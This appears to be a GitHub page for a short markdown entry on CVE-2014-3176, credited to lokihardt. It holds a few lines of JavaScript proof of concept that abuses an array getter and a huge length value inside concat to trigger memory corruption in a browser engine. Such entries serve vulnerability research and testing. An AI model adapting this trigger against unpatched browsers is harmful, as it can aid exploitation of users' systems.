Skip to content

Latest commit

 

History

History
20 lines (14 loc) · 269 Bytes

CVE-2014-3176.md

File metadata and controls

20 lines (14 loc) · 269 Bytes

CVE-2014-3176

  • Date: Jun 20
  • Credit: lokihardt

PoC

a = [1];
b = [];
a.__defineGetter__(0, function () {
     b.length = 0xffffffff;
});

c = a.concat(b);

Reference